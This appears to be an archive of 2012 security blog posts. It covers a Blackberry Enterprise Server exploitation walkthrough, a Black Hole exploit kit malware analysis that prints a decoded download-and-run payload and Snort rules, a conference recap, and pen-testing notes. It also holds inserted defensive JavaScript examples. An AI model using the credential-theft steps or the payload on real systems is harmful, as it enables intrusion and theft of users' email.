Tuesday, January 31, 2012

Exploring Your Browser LocalStorage

by Neelay Shah.

HTML5 adds a number of new features and technologies that allow developers to build rich and immersive web applications. One of the features introduced is "LocalStorage", which allows web applications to store data in a "persistent" fashion in a client-side (browser) store.

Foundstone HTML5 Local Storage Explorer is a Firefox extension that allows viewing, modifying and deleting data items stored in the browser's LocalStorage. It also allows the user to copy the contents of the Local Storage to the clipboard.


You can download and install the extension from:


Here's the menu bar button that can be used to invoke HTML5 Local Storage Explorer once it is installed.

Here's the main screen, which displays the contents of the Local Storage. It allows emptying the local storage, refreshing its contents, copying its contents to the clipboard, viewing the version and developer information, and closing the add-on window.
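The extension enumerates the same Web Storage API (length, key(i), getItem) that any page script can. As an added example that is not part of the original post or of the Foundstone extension, the script below walks a Storage object that way and flags entries that look like credentials; the key-name and JWT-shape heuristics and the in-memory MemoryStorage stand-in (so it runs under Node without a browser) are assumptions made for this illustration.

```javascript
// Added example (not from the original post or the Foundstone extension):
// enumerate a Web Storage object through the standard Storage API
// (length / key(i) / getItem) and flag entries that look like secrets.

// Heuristics are assumptions for illustration: key names commonly used for
// credentials, and values shaped like a JSON Web Token (three base64url parts).
const SENSITIVE_KEY = /(token|session|auth|passw|secret|jwt|api[-_]?key)/i;
const JWT_SHAPE = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$/;

// Returns one record per stored item: key, size in characters, and why (if) it was flagged.
function auditStorage(storage) {
  const entries = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key);
    const reasons = [];
    if (SENSITIVE_KEY.test(key)) reasons.push('sensitive key name');
    if (JWT_SHAPE.test(value)) reasons.push('JWT-shaped value');
    entries.push({ key, chars: value.length, flagged: reasons.length > 0, reasons });
  }
  return entries;
}

// Keys of the flagged entries only, handy for a quick report.
function flaggedKeys(storage) {
  return auditStorage(storage).filter(e => e.flagged).map(e => e.key);
}

// Minimal in-memory stand-in for window.localStorage so the audit runs under Node.
// In a browser, pass window.localStorage (or sessionStorage) instead.
class MemoryStorage {
  constructor(obj) { this.map = new Map(Object.entries(obj)); }
  get length() { return this.map.size; }
  key(i) { const keys = Array.from(this.map.keys()); return i < keys.length ? keys[i] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
  clear() { this.map.clear(); }
}

// Constructed sample contents, not captured from any real site.
const SAMPLE_STORAGE = new MemoryStorage({
  theme: 'dark',
  auth_token: 'eyJhbGciOiJub25lIn0.eyJzdWIiOiJkZW1vIn0.',
  cartId: '12345',
});

console.log(auditStorage(SAMPLE_STORAGE));
```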

Tuesday, January 24, 2012

Hack Tips: Blackberry Enterprise Server Exploitation

By Tony Lee and Patrick Bogen

This article is the first in a series covering, step-by-step, the practical attacks that can be performed against various common network servers. This week’s victim is Blackberry Enterprise Server. Compromising this service allows the attacker to impersonate users, access stored e-mail, and send arbitrary messages to users on the Blackberry system.

Overall, the process involves the following steps:
  1. Identifying a Blackberry Enterprise Server
  2. Identifying the BES Administrator Account
  3. Gaining Access to the BES Administrator Account
  4. Accessing the Blackberry Management Interface
  5. Post-Exploitation with Blackberry Manager

Identifying a Blackberry Enterprise Server

There are at least four ways (ordered below from most certain to least certain) to identify whether a given server is a Blackberry server: viewing the list of services running on the host; locating the server software files on the host; examining the list of service accounts on the host and identifying a Blackberry-associated account; or, potentially, simple inspection of the system hostname.

Running Services

The Blackberry Enterprise Server software uses a number of services to handle requests. If any of these services are running on a host, it indicates that the system is, by definition, running the Blackberry Enterprise Server. Check for some of the services listed below:

C:\> net start | findstr /i blackberry
BlackBerry Alert
BlackBerry Attachment Service
BlackBerry Collaboration Service
BlackBerry Controller
BlackBerry Dispatcher
BlackBerry MDS Connection Service
BlackBerry Policy Service
BlackBerry Router
BlackBerry Synchronization Service

Server Software Files

The Blackberry Enterprise Server software installs, by default, in “C:\Program Files\Research In Motion\BlackBerry Enterprise Server”. The presence of these files strongly suggests that the server is a Blackberry Enterprise Server.

User Accounts

There is no specific required name for the server account, but the server documentation uses “BESAdmin.” The presence of this account would indicate that the system is a Blackberry Enterprise Server (and, further, that the administrator is fairly literally-minded). Variations on this are also possible, for example “besadm,” “bbadmin,” and so on.

Host Name Convention

Organizations commonly name hosts based on the functionality, location, or sometimes even the owner of the host. This is intended to make it convenient for the administrator to determine useful information about the host, and it also makes training new staff easier. This convenience introduces a slight security risk, in that these hosts can easily be targeted by attackers based on the information the administrator includes in the hostname. Organizations that conveniently name their hosts are likely to name their Blackberry server something like “BES,” “Blackberry,” “BBServer,” etc. This is not an especially reliable indicator, but it can be used to triage hosts for further scrutiny.

Identifying the BES Administrator Account

Once a specific server is targeted, the attacker needs to identify the Blackberry administrator account on the system. This can be accomplished by examining the contents of the “Documents and Settings”/“Users” directory and examining locations or permissions on the BES files.

“Documents and Settings” or “Users” Directory

The “Documents and Settings” or “Users” directory will contain a subfolder for each user that has logged in to the system. Since the Blackberry Administrator account will be one such user, a directory for this account will likely exist in this hierarchy.

C:\>dir c:\users
Volume in drive C is OS
Volume Serial Number is

Directory of c:\users

11/10/2011 08:10 AM <DIR> .
11/10/2011 08:10 AM <DIR> ..
12/02/2010 09:02 AM <DIR> alice
09/01/2011 10:08 AM <DIR> bob
07/13/2009 11:57 PM <DIR> Public
05/19/2011 01:43 PM <DIR> Administrator
11/07/2011 03:26 PM <DIR> BESAdmin
0 File(s) 0 bytes
7 Dir(s) 23,291,475,804 bytes free

BES File Permissions or Locations

The Blackberry administrator account may have special permissions set on the files related to the BES software. Checking the permissions on such files to discover which account has special access may reveal the Blackberry administrator account. Locate one of these files (e.g., in C:\Program Files\Research In Motion\BlackBerry Enterprise Server), right-click on the file, select “Properties,” and select the “Security” tab. Shortcuts on a user’s desktop can also help to identify that user as a BES administrator.

Gaining Access to the BES Administrator Account

There are four main approaches to gaining credentialed access to the administrator account. The first, of course, is to compromise the domain, if the account is a domain account and not local to the host; however, gaining control over a target’s domain is left as an exercise for the reader. The other three options can be accomplished with access only to the local host: the attacker can collect password hashes from the local SAM if the account is local to the host; collect password hashes (for both local and domain accounts) from memory using the Windows Credential Editor; or discover a file on the local system that contains credentials. Given password hashes, the attacker would then need to crack the passwords or replay them into a process that is able to open the BES thick client (a “pass the hash” attack).

Dumping Local Password Hashes

A variety of tools exist for dumping password hashes. It is often the case that a single tool works only on a subset of the various versions and deployments of Windows. Example tools that can perform in this role are:

There are variant versions of even these few tools available that work on certain Windows versions and not others, so it is often the case that multiple attempts will be needed with different tools before one tool is found to work properly.

Using Windows Credential Editor

The Windows Credential Editor, from Amplia Security, performs a function similar to the hash dumping tools described above, but instead gathers hashes from memory. The tool’s functionality is simple: run the tool at the command line, and it will list the hashes extracted from memory:

C:\> wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.


Data-mining the Filesystem

Searching the file system can reveal instances where administrators have stored the user’s password in plain text (for example, in a configuration file or a “notes” document). The Windows command shell contains native commands that can accomplish such a search. The following command searches the contents of files on the system drive for the string ‘pass’:

C:\> findstr /I /S /M pass C:\*

Alternatively, searching for the known username might reveal files that contain the username and password pair (this will also reduce incorrect hits):

C:\> findstr /I /S /M BESAdmin C:\*

Searching for files with “pass” in the filename can be accomplished with the following:

C:\> dir /a /s /b c:\*pass*

Accessing the Blackberry Management Interface

Blackberry Enterprise Server provides two methods for managing the system: a web-based front-end (which must be specifically installed by an administrator) and a thick client application, “Blackberry Manager”.

Web-based Front-end

If installed, the web interface will be available at the following URL:


Blackberry Manager

The thick client management application, “Blackberry Manager,” is installed along with the server software, and thus should be available on the server in the following directory, presuming the server software is installed in “C:\Program Files\Research In Motion\BlackBerry Enterprise Server\”:

C:\Program Files\Research In Motion\BlackBerry Enterprise Server\BBMgr\Server\bbmgrw32.exe

When accessing the thick client application as a non-BlackBerry administrator, the application will prompt for credentials. However, when the user is logged in to Windows as the Blackberry administrator account, the application will open without prompting for credentials.

Post-Exploitation with Blackberry Manager

Having finally gained access to the management interface of the Blackberry server, there are three activities of interest to an attacker. The management application can be used to send messages directly to a user’s Blackberry device (bypassing the Exchange email server); to send messages to both the device and the user’s e-mail; and, most damaging of the three, to re-provision devices, thus granting an attacker’s device access to the target’s saved e-mail.

Sending Messages Directly to Blackberry Devices

From the “All Users” tab, search for or select a user. Right click on the targeted user and select “Send Message”. Sending messages by PIN (rather than by e-mail) will send the message only to the user’s Blackberry device (not to their email account).

Sending Messages to Blackberry Device and E-Mail

From the “All Users” tab, search for or select a user. Right click on the targeted user and select “Send Message”. Sending messages by E-Mail (rather than by PIN) will send the message to both the user’s Blackberry device and the user’s associated Exchange account.

Provisioning a New Device

Once a new phone is provisioned, the attacker can download a copy of all of the user’s emails, as well as send emails as the account owner. Unlike Good Enterprises (discussed later in this series), only one device per e-mail address can be registered per Blackberry Enterprise Server. This means that if the attacker provisions a new device on the target’s account, service to the target’s old device will be disrupted. For this reason, provisioning a new device is a temporary mechanism to access the stored e-mails rather than a persistent compromise of the user’s account—unless there are multiple Blackberry servers.

The attacker must re-activate the user’s old device after exfiltration of any data of interest in order to minimize the chance of the target noticing a disruption in service.

Tuesday, January 17, 2012

JAVA/HCP/Black Hole Exploit Kit malware analysis

By Christiaan Beek


A couple of weeks ago there was a good amount of commotion around the use of Java and the Black Hole exploit kit to infect users. While I was in Abu Dhabi teaching a class, I remembered that two weeks earlier we had a similar case in which Java and the URL structures used by the Black Hole exploit kit appeared, so I decided to write up a little post to explain it.

The attack started with a targeted email to a certain department containing a URL from which victims could download the error report.

This email contained a ‘suspicious’ URL:


This URL points to a site which is empty and shows the message “page is loading…wait”. In the source code of the page, the following URLs were discovered:

In this page there are 4 URLs which are accessed; all of them contain the same JavaScript file.

In the Java file, another URL is hidden:

This site was actually hosting several different pieces of malware:


Malware behavior

In an isolated lab environment, the following URL was executed to study its behavior:


The JAR file contained several instances of obfuscated code which made it slightly difficult to analyze. After the first part was decoded, the infection vector became clear:

The first part of the script (after the eval) was obfuscated using decimal codes. I used Malzilla: in the Misc Decoders tab I pasted the script, selected the right area, and clicked the ‘Decimal’ option, which decoded the obfuscated piece:
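The decimal layer can also be peeled statically, without Malzilla and without ever running the script. As an added example (not from the original post or Malzilla), the Node script below substitutes every String.fromCharCode(n, n, ...) call with the decoded string literal and then looks for the indicators discussed in this post; the sample script is constructed and harmless, and the indicator list is my own choice.

```javascript
// Added example, not from the original post: static decoding of the
// "decimal code" obfuscation layer (String.fromCharCode(104,99,112,...))
// so the payload can be read without executing it.

// Matches String.fromCharCode( n, n, n ) where every argument is a decimal number.
const FROM_CHAR_CODE = /String\.fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;

// Turn a comma-separated list of decimal code points into a string.
function decodeDecimalList(list) {
  return list
    .split(',')
    .map(n => String.fromCharCode(parseInt(n.trim(), 10)))
    .join('');
}

// Replace each fromCharCode call with a quoted literal of its decoded text.
// This is one pass; for layered encodings, run it again on the decoded text
// after removing the surrounding eval(...) wrapper.
function peelDecimalLayer(script) {
  return script.replace(FROM_CHAR_CODE, (_, args) => JSON.stringify(decodeDecimalList(args)));
}

// Indicators worth surfacing after decoding (taken from the analysis in this post):
// the hcp:// handler, helpctr.exe, the Black Hole hcp_vbs.php URI, and eval itself.
const INDICATORS = [/hcp:\/\//i, /helpctr\.exe/i, /hcp_vbs\.php\?f=/i, /\beval\s*\(/];

// Returns the source text of every indicator pattern found in the decoded script.
function findIndicators(decoded) {
  return INDICATORS.filter(re => re.test(decoded)).map(re => re.source);
}

// Constructed, harmless sample: eval(String.fromCharCode(...)) wrapping "var x=1;".
const SAMPLE_SCRIPT = 'eval(String.fromCharCode(118,97,114,32,120,61,49,59));';

const decoded = peelDecimalLayer(SAMPLE_SCRIPT);
console.log(decoded);                 // eval("var x=1;");
console.log(findIndicators(decoded)); // the eval pattern only
```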

Infection vector

In the first couple of lines the following can be detected: [hcp://services …. Helpctr.exe]. This indicates that the Microsoft Help and Support Center URL escaping vulnerability is being used. In the above fragment, the escaping is done using multiple ‘%A’s. This vulnerability is documented as CVE-2010-1885.

Malware behavior continued

In the decoded part of the vulnerability the following became visible:

eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://advxxxxxxxxxx.com/content/hcp_vbs.php?f=166::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe)))

First it creates a VBS file (l.vbs) in the %TEMP% folder and initiates a GET request for another web resource through the XMLHTTP object. The web resource is another VBS file disguised as a PHP file:


The ‘hcp_vbs.php?f=’ part of the URL is known to be part of the ‘Black Hole Exploit Kit’.

Blackhole Exploit Kit: ‘The Black Hole exploit kit is an unethical off-the-shelf Web application. The first instance - v.1.0.0 beta - has appeared on the black market and was advertised in August 2010 as a "System for network testing". As with most of the exploit kits, it is based on PHP and a MySQL backend. The payload of this kit usually targets Windows operating systems and an application installed on those systems, but depends on the criminals' end goal.’ (source: http://community.websense.com/blogs/)

After the l.vbs file is created, it is executed. The heavily obfuscated code was analyzed and the following interesting parts became visible:

This particular piece of the application checks which versions of Java, PDF and Flash are on the system. Another piece of code shows that the User-Agent information is read to determine which device or operating system the client uses:

This information is sent back to the Black Hole Kit gateway, and the available exploits are sent back to take over the machine, execute remote commands, etc.
In my lab, I used an unpatched version of Windows X and an outdated version of Shockwave Flash. Acrobat and Java were up to date.

Next, the delivery mechanism retrieved a variant of the TDSS rootkit.

Memory analysis

After infecting the lab machine, a memory acquisition was taken for analysis. Using several tools it became clear that traces of malware had hooked themselves into the following (valid) Windows processes:
  • IExplorer
  • SVChost
By dumping the malicious parts of memory, I was able to compare them against our internal malware database and the website Virustotal.com. Only 7 out of 43 antivirus engines were capable of detecting this variant of TDSS/Alureon.


Check if your systems are patched for the HCP vulnerability:

Snort detection rules (source: Chris Wakelin)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f="; http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity; sid:2013077; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit"; flow:established,to_server; content:"/pch.php?f="; http_uri; pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2"; flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri; pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;
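The three rules above key entirely on the request URI, so the same patterns can be run over historical web-proxy or access logs when Snort was not in place at the time. As an added example (not part of the post or of the Emerging Threats rule set), the Node script below applies the rules' pcre expressions to constructed common-log-format lines; the log lines, client addresses and parser are assumptions for this illustration.

```javascript
// Added example, not part of the post or of the Emerging Threats rules:
// the three URI patterns from the Snort rules above, applied to a
// constructed access log so past traffic can be checked retroactively.

// Same expressions as the rules' pcre: options. The /U modifier in Snort means
// "match against the normalized URI", which is what is extracted from each line.
const RULES = [
  { sid: 2013077, name: 'Blackhole Exploit Pack HCP overflow Media Player lt 10', re: /\/hcp_asx\.php\?f=\d+$/ },
  { sid: 2013548, name: 'Blackhole Exploit Pack HCP exploit',                     re: /\/pch\.php\?f=\d+$/ },
  { sid: 2013549, name: 'Blackhole Exploit Pack HCP exploit 2',                   re: /\/hcp_vbs\.php\?f=\d+&d=\d+$/ },
];

// Parse one common-log-format line into client, method, URI and status.
const LOG_LINE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})/;

// Returns one hit per (line, rule) match, in log order.
function scanLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;                       // skip blank or malformed lines
    const [, client, method, uri, status] = m;
    for (const rule of RULES) {
      if (rule.re.test(uri)) {
        hits.push({ client, method, uri, status: Number(status), sid: rule.sid, name: rule.name });
      }
    }
  }
  return hits;
}

// Constructed sample log lines (not real traffic); addresses are placeholders.
// The last line shows the anchoring: an extra parameter after f=17 does not match.
const SAMPLE_LOG = [
  '10.0.0.5 - - [12/Jan/2012:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
  '10.0.0.5 - - [12/Jan/2012:10:01:05 +0000] "GET /content/hcp_vbs.php?f=166&d=0 HTTP/1.1" 200 2048',
  '10.0.0.7 - - [12/Jan/2012:10:02:11 +0000] "GET /pch.php?f=17 HTTP/1.1" 200 900',
  '10.0.0.8 - - [12/Jan/2012:10:03:00 +0000] "GET /pch.php?f=17&x=1 HTTP/1.1" 404 0',
].join('\n');

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`${hit.client} ${hit.method} ${hit.uri} -> sid ${hit.sid} (${hit.name})`);
}
```

Note that the pcre expressions are anchored with `$` on a purely numeric f= (and d=) value, so a URI with extra characters in those parameters, like the one quoted earlier in this post, would need a looser expression to match.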

Monday, January 16, 2012

Infiltrate Wrap Up

By Brad Antoniewicz.

Last week I spoke at Immunity’s Infiltrate 2012 at the Gansevoort Hotel in Miami Beach. The single-track conference was small-medium sized, having around 200(?) people in attendance.

Infiltrate’s coordinators made being a speaker feel like being a celebrity. Flights and hotel rooms were paid for, a car picked me up at the airport, the location was fun, and for all attendees - breakfast, lunch, and dinner were provided. The open bar opened at 1pm everyday. It was awesome.

The CFP and conference preparation process made me feel like the organizers really cared about having quality presentations. It was nice to receive a phone call from a technical team asking questions to feel out exactly how put-together and complex the work I was doing was. The pre-conference dry-run was a nice touch too, and although there weren’t many questions or suggestions for my talk, it was nice to have some outside opinions. Another nice touch was that Dave Aitel was involved in much of the CFP and preparation process, which further demonstrated how much he really cared about putting together a good conference.

Even though there was a good amount of involvement in vetting speakers and a lot of planning clearly went into the conference, I was a little surprised that some talks had already been presented at other conferences. I shouldn’t really be criticizing this (since I’m giving the same talk at Shmoocon in two weeks), but I think Infiltrate has worked hard to raise the bar when it comes to talks – a goal that I greatly admire. I think that the more times a presentation is given, the less exotic the content becomes. So even if the research produces amazing insight, everyone already knows about it, so the content is no longer “the best of the best”. At other conferences I think it's OK to see a presentation that has been given a few times already, but if Infiltrate wants to maintain the perception that only the best of the best talks will be presented, then they need to vet out the duplicates.

Also, there were just a couple of talks that were not as “offensive” as I had hoped. With the bar raised so high, my expectations are even higher, so if I don’t see stuff getting completely ripped apart and owned, I feel like it’s something better presented at a conference with less emphasis on total pwnage.

Reservations aside, the majority of the content at Infiltrate was engaging and thought-provoking - exactly what I’d expect from a security conference.

Little Things:

  • Badges – I’m still not sure how I feel about this, but at Infiltrate, your conference badge was a wristband. Badges are traditionally a fun little knick-knack at every conference, usually containing some sort of encoded message, challenge, etc... but at Infiltrate, that didn’t exist. Does it matter? Would I sacrifice an open bar for a cool badge? Probably not.
  • Event support staff – Everyone I encountered was extremely nice and quick to offer a helping hand whenever I had a question or needed anything.
  • Presentation Lengths – Talks were 45 minutes. I think they should have been 60. Some talks were cut short for the sake of time, while others went over, affecting the flow of the conference.
  • Lunch and Dinner – Food was really good and tasty; desserts (my specialty) were outstanding!

Overall Impression

I have to say that it’s refreshing to attend and be involved in a conference like Infiltrate. Our industry is getting oversaturated with conferences that are filled with stale and sometimes uninspiring content. If we cannot collectively raise the bar, we’re not motivating ourselves to produce creative and innovative research – and if we’re not doing that, we might as well surrender our intellect, curiosity, and integrity to the vendors who would prefer to ignore the security of their customers to increase their profits.


Here’s a quick run-down on the talks that I was able to take notes on. Keep in mind that I’m not an expert in really any of these topics, so I’ll try my best to summarize accurately but if you really want to know the specifics, look around online or contact the presenter.

Day 1 Keynote – Thomas Lim

Thomas’ blunt and extremely entertaining presentation style kicked off the conference spectacularly. His talk resonated with me throughout the conference. The keynote started by discussing the challenges of running a good conference. Most conferences don’t make more than $10k, which means, given the amount of time invested, the organizers end up losing money or barely breaking even. Another major challenge is finding good speakers. In his experience there is a bit of a talent problem:
  1. It’s hard to find people who are doing amazing things
  2. It’s common to get a CFP response from someone who writes really well, but whose actual content is lacking or who presents horribly. This can really negatively impact a conference
  3. There are a lot of people who keep reusing content - he said that a good rule of thumb is to avoid presenting the same talk more than 3 times.
Thomas also mentioned the threat and severity of cyber warfare. He explained that it's much cheaper for a government to train a cyber-army than it is to train a real one, and that there are ongoing attacks originating from countries like China against the United States on a regular basis. He questioned why the US isn’t retaliating against these attacks, implying that the U.S. may be reluctant due to a dependence on China.

Voight-Kampff'ing the Blackberry Play Book - Zach Lanier/Ben Nell

The title is a reference to Blade Runner. Zach and Ben’s information-packed presentation covered a number of different vulnerabilities they’ve discovered in the Blackberry Playbook. Although many of the vulnerabilities have already been addressed by RIM and spoken about, it was very interesting to see the types of issues they uncovered. An interesting discovery was around a legacy QNX “feature”, which is applicable to any services that leverage Persistent Publish/Subscribe (PPS). Configuration and other files are stored within the PPS directory structure and are protected by POSIX file permissions. Although the permissions appropriately restrict unauthorized applications from accessing their contents, a mirror of the file contents is provided within a “.all” file, which has much more relaxed permissions. This means that sensitive information (session tokens and PINs, for example) is accessible to anything that has local access.

Next, any native code application can essentially bypass application permissions and do pretty much anything. Lanier and Nell apparently wrote an application that, from the user’s perspective, required no permissions, but once run, served a shell to a remote host.

Applications within the app store are assigned an identifier. Every version of the application is assigned a unique identifier and those versions are always available on the app store. The problem is that the identifier is sequentially assigned, and the URL providing the application does not require authentication. This means that anyone can download any application and application version for free.

Finally, the two spoke about Sapphire proxy, which is an internal service that is used as part of "bridge" - a service involved in Bluetooth communication. Since the Playbook uses Bluetooth to pair with a central messaging device, you can leverage Sapphire proxy to intercept and view email, as well as other messaging data.

Unearthing the World's Best WebKit Bugs - Michel Aubizzierre

Michel’s quirky slides were right up my alley and had me chuckling. His presentation was around reviewing public development branches of open-source projects (this talk was around WebKit) and tracking code developers who are known to patch bugs or write code that contains bugs. Using that information and tags that are included within bug reports, he wrote a proof-of-concept tool to uncover vulnerabilities that have yet to reach the stable branch. He mentioned that his tool identified somewhere around 76,000 potential bugs, but it is difficult to tell which are actually exploitable. Additionally, since many of the bugs that fit these criteria are restricted from public viewing, it's difficult to truly measure the severity and accuracy of the bugs identified.

Effective Denial of Service Attacks Against Web Application Platforms - Alexander Klink/Julian Waelde

This presentation was already given at CCC on December 27th; although I missed the live feed for it, I did read a little bit about the attack online. That being said, Klink and Waelde did update the slides to include vendor responses, which I found to be interesting. Additionally, it was nice to be able to ask them questions when I just so happened to sit next to them during the conference.

Here’s a summary of vendor responses, and resolution status:

  • PHP has a workaround in PHP 5.3.9
  • ASP.NET is patched as of Dec 29th (MS11-100), exploit code exists.
  • Java is more susceptible, and since it is used by many different application servers, has a wider reach to things like Apache, Glassfish, Jetty, etc..
    • Apache Tomcat - Workaround Patch 7.0.23, 6.0.35
    • Oracle GlassFish - Will be fixed (S0104869)
    • Oracle does not plan to fix the issue in Java, but rather have the Application server handle it
  • Python - No Response, under "active discussion" on mailing lists
  • Ruby - Fixed in 2008 version 1.9, other derivatives
    • CRuby/JRuby/Rack fixed Dec 28th.
  • v8/node.js (Javascript implementation by Google, used on server side) patches exist, but not implemented.
If no fix is available for your platform, you can limit the size of POST requests.

A Heap of Trouble: Breaking the Linux Kernel SLOB Allocator - Dan Rosenberg

Dan's talk covered one of the Linux kernel's heap allocators, called the SLOB (Simple List of Blocks). He mentioned there are three allocators, SLUB, SLAB and SLOB -- with SLOB having just about no sanity validation or exploit mitigation compared to other allocators. This allocator is commonly used in embedded Linux distributions such as OpenWRT. He mentioned that he plans on releasing a whitepaper, and right after the conference, he tweeted about libplayground, a framework for delivering Linux kernel heap exploitation techniques.

Day 2 Keynote - Andrew Cushman

Andrew Cushman leads the Trustworthy Computing Group at Microsoft. His keynote covered a handful of interesting ideas, looking at the need for adaptive change within the industry as a whole. He's seeing shifts in attacks from networking and infrastructure equipment to intellectual property, foundations, and business models. In turn, this moves security controls from security engineering and operations to government regulations, cyber security policies, and similar agendas. There are even groups that would like to see Internet governance shift to a multi-country regulatory body. (yikes)

He also discussed Microsoft's approach to handling security mechanisms within its software. Microsoft has evaluated exploit economics and devised a way to reduce the appeal of attacking their software. In short, Microsoft works to decrease an attack’s ROI by increasing the attacker's investment (more time spent learning, developing attacks) and decreasing attacker opportunity to recover investment (quicker patch turn around via windows update).

Finally, Cushman wrapped up his talk by saying that exploit mitigations raise the bar for attackers, and he suggests that if you don't want to spend the time to learn the advanced techniques, social engineering is the next best thing, since it requires less technical skill but can have a devastating effect.

Attacking Proximity Card Access Systems - Brad Antoniewicz

If you ask me, I thought it was a good talk :)

Secrets in Your Pocket: Analysis of [Your] Wireless Data - Mark Wuergler

Mark's extremely well designed presentation (his twin brother is a graphic artist) was the result of many months of data collection and analysis. He discussed the potential of tracking people via the wireless data originating from their cell phones or other always-on devices. Although I've seen a couple of different research studies around this, Mark's presentation was unique in the sense that he created a tool, called Stalker, that takes an input PCAP and analyzes the data within it to create a profile of a user. It also fetches information from outside sources to complete the overall picture. There are some caveats: the data shouldn't be encrypted to get the most out of the tool, and some of the techniques the tool uses require a few specific environmental factors to be present. Mark also noticed that on certain mobile devices, if they're connected to a wireless network that doesn't provide DHCP, the device will attempt to blindly ARP out to the default gateway of previously-used wireless networks. If on an open wireless network, these ARPs can be observed and used to identify where a person has been. Perhaps even more interesting than the actual tool were some of the active attacks Wuergler showed against users on open wireless networks (implemented by the tool). An access token is sent when using Facebook-enabled applications (such as Pandora); if an attacker can obtain this access token, there is a possibility that the attacker can create a forged request to increase the privileges of the application (which are set client-side). The attacker could then access any of the user’s Facebook data (inbox, status, pictures, etc.).

Undermining Security Barriers - further adventures with USB - Andy Davis

Andy's talk was previously presented but updated to account for the release of a new tool, FrisBee Lite. Although there are some tools for USB testing, most are expensive and somewhat limited. The $1200 Packet Master USB 500+ AG is described as Wireshark for USB with injection capabilities. The issue is that the supporting software that's packaged with the device has a non-existent API and a limited scripting language, making it difficult to leverage it for more comprehensive fuzzing. Even then, the presenter wrote a script to create basic fuzzing test cases, but it was very slow and restricted. The next approach was an Arduino-based tool called FuzzBox, which was greatly limited since it could only emulate USB HID devices. FuzzBox is also pretty slow due to speed constraints on the Arduino.

FrisBee Lite is a wxPython application that makes fuzzing relatively simple, via a point and click Windows GUI. The tool has been leveraged to find flaws in Solaris, the Xbox, iOS, and Mac OS X. An interesting side effect of the fuzzing was that when the author was testing certain operating systems with endpoint protection software installed, he actually found cases that crashed the software responsible for monitoring the insertion of USB devices.

Don’t Hassle The Hoff: Breaking iOS Code Signing - Charlie Miller

Although I previously saw a good amount of coverage around Charlie Miller's iOS code signing hax, his presentation was still informative and entertaining. The initial David Hasselhoff application he attempted to get published to the app store was a hilarious back story.

Tuesday, January 10, 2012

Just That Easy: Real World Pen Testing Attack Vectors [Part 2]

By Tony Lee and Robert Portvliet

Whether you agree with the term Advanced Persistent Threat (APT) or not, the capabilities are certainly out there, often in freely available tools (nod to Metasploit, WCE, nmap and other tools). Adversaries do not care that they can obtain Domain or Enterprise administrator access; it is what they can do with those permissions after they achieve that privileged access. This is what should keep CISOs awake at night.

Things CISOs should question:
  • What are our critical assets?
  • How easily can the attackers find and access those critical assets?
  • What will attackers do with that information? Post to the web? Sell it?
  • How will the media cover this?

These are the motivating factors for organizations to conduct these real world assessments. These assessments show impact; thus we will continue with part 2 of our series on real world pen testing.

Critical Assets

After performing the type of research (as shown in Part 1 of this series), you would imagine that you know what the critical assets are... or do you?


How does the organization make their money?

Not all organizations make money by selling a product; some sell other intangible things such as information or personnel records, processing, etc. Your POC can help you determine what is critical to the organization. In this example, we are targeting Acme Industries, whose business is selling widgets; there are a number of items of interest.

  1. Widget designs – blueprints, schematics, dimensions on how they make those widgets
  2. Widget formulas – What goes into making those awesome widgets? What chemicals are used?
  3. Widget creation process – What is the process (exact steps) for reproducing a widget?
  4. Widget improvements – What is the latest feature of the (soon to be released) widget?
  5. Widget marketing – What are they going to release and when? Can we beat them to it?
  6. Etc. The list goes on…

Not So Obvious:

Company enablers – What enables the company to exist? Finances of the organization, employees, key individuals, partnerships, etc.

  1. Organization Finances – Purchases, deposits, clients, balances
  2. Employee data – Roles, responsibilities, personal information (PII)
  3. Key individuals – Sensitive information on C-level execs, key scientists, inventors
  4. Partnerships – Key relationships with other companies

Accessing the Critical Assets

After identifying the critical assets listed above, and gaining that initial foothold as shown in part one, now you need to find and access the goods.

Location of Goods:

The critical assets are usually stored in both local home directories as well as file servers. Local home directories are usually used as a sort of scratch pad, whereas the centrally managed file servers are used to store completed projects and deliverables. Sometimes local home directories are actually central file servers due to distributed storage and ease of backup. This can make data mining easier for an attacker if everyone’s home directory is in one location.

One way you can tell where the home directory goods are stored is using “net user”:

    net user TonyLee /domain

    User name                    TonyLee
    Full Name                    Tony Lee
    Comment                      Guy writing this article
    User's comment
    Country code                 000 (System Default)
    Account active               Yes
    Account expires              Never

    Home directory               \\CentralServer\TonyLee
    Last logon                   1/2/2012 7:28:17 AM

    Logon hours allowed          All

    Local Group Memberships      *Administrators       *Users
